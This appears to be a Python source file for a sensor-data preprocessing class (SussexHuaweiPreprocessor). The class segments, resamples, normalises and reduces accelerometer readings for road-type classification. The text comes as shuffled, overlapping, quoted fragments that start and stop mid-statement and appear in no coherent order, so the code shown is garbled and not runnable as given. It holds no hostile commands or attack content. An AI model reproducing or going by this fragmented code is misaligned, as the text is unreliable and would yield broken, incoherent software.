"self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current", "None, std = None): \"\"\" Apply z-normalization to a data set. :param data:", "for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels)", "1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind],", "= data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index", ":param label_column: :param args: :return: \"\"\" try: if data is None or mode", "\"\"\" try: if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", ":return: \"\"\" try: if data is None or mode is None or reduced_column_name", "car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in", "overrides import traceback import os import pandas from sklearn.decomposition import PCA import numpy", "to center around 0.0 substract 0.5 else: data = (data - data.min()) /", "for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) #", "str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source:", "segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index()", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None):", "for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels)", "return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data(", "reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data,", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column", "\"\"\" Removes outlieres either based on quantile or a threshold value. :param data:", "= data.mean() std = data.std() data = (data - data.mean()) / data.std() elif", "selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label", "column = 'time', unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data,", "in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers]", "or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq,", "self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25", "value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None", "= data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len", "training. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels,", "os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector and data matrix.", "= None for ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns]", "valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]", "list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99", "\"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\"", "data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by", "selected_data = data[data[label_column] == target_label] # 2. Split by non-subsequent indices # Source", "ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality", "via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid", "= [] for target_label in args: selected_data = data[data[label_column] == target_label] # 2.", "ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "@overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode:", "= [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels )", "mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 #", "to a global coordinate system. :param data: :param target_columns: :param mode: :param args:", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 #", "data is None or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "#Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better", "# current run @0.95 for classical approach via TS Fresh )[:-2] #Test data_test", "technique to a data set. :param data: :param mode: :param reduced_column_name: :param columns:", "def label_data(self, labels, data): \"\"\" Combines labels vector and data matrix. :param labels:", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "for classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test,", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile':", "or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column,", "data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments", "[] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for", "data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data is", "label_data(self, labels, data): \"\"\" Combines labels vector and data matrix. :param labels: :param", "road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments", ") for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind]", "data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] =", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None):", "win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test,", "# Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1)", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label',", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for", "set. :param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if", "8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] =", "in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for", "labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train", "len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "= data.std() data = (data - data.mean()) / data.std() elif mean is not", "range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]],", ":return: \"\"\" try: if data is None or target_columns is None or mode", "after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments", "#data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train,", "= [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels )", "datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments =", "@0.95 for classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns)", "list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data,", "columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str)", "PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index", "mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2],", "= ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train", "is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "data): \"\"\" Combines labels vector and data matrix. :param labels: :param data: :return:", "data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return", "Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns])", ") print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train", "= self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row')", "axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val':", "\"\"\" Apply all preprocessing steps necessary for training. :param data: pandas.DataFrame :param params:", "for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than", "is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "= split(data, segment_length) if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))", "return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names #", "isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode", "ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param", "mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates to a global", "#data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row')", "Desegements as time series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\" try:", "replacement_mode == 'quantile': # Source for next 7 lines of code after comment:", "isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data),", "str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if", "ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1.", "@overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data. :param", "replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data,", "if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or", "project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates", ":return: \"\"\" try: if data is None or mode is None or columns", "if data is None or mode is None or columns is None: raise", ":param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels =", "print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len", "inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if", "else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError,", "pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index =", "road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment", "[] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for", "= data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data =", "or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except", "config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column", "columns = None): \"\"\" Apply a dimensionality reduction technique to a data set.", "for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate", "data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train =", "is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise", "range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "data, mode, label_column=None, args=None): \"\"\" Segements a time series based on a label", "is None and std is None: if columns is not None: mean =", "column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise", "data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid =", "smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1,", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or", "args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = [] split = lambda", "data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise", "data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca': # Source: #", "return segments #3. Remove segments that are too long or too short after", "None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is", "Resamples quantitative data. :param data: :param freq: :param mode: :return: \"\"\" # Source:", ":param data: :return: \"\"\" try: if data is None or labels is None:", "'1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data", "= segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None:", "or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if", "in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is", "\"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz']", "mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns:", "/ std else: data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std() data = (data", "replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value if", ") data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data", "coordinates to a global coordinate system. :param data: :param target_columns: :param mode: :param", "segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length),", "# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index", "alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name})", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id']", ":param data: :param columns: :param mean: :param std: :return: \"\"\" try: if data", "https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]]", ":param data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try:", "'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced =", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError):", "selected_columns=None, axis = 0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns:", "os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to", "replacement_mode): \"\"\" Remove rows that have an unwanted label. :param data: :param unwanted_labels:", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return data.resample(freq).mean() if", "via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid =", "try: if data is None or mode is None or reduced_column_name is None:", "if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "try: if data is None or mode is None or columns is None:", "axis = 0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param", "Change representation of a data set. :param current_representation: :param target_representation: :param data: :return:", "(data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "= self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data", "sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self,", ":param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try:", "columns is not None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns]", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(", "pipeline.feature_engineering.preprocessing.abstract_preprocessor import Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy", "return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode ==", "data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test", "'replacement_val', 'delet_row' :param replacement_value: any type, used as value if replacment_mode is 'default_val'", "target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "data segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index() segment.index =", "encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in", "data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical", "None: if columns is not None: data[columns] = (data[columns] - mean) / std", "not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data =", "data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label',", "data. :param data: :param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html", "approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None):", "global coordinate system. :param data: :param target_columns: :param mode: :param args: :return: \"\"\"", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "set. :param data: :param columns: :return: \"\"\" try: if data is None: raise", "if data is None or mode is None or 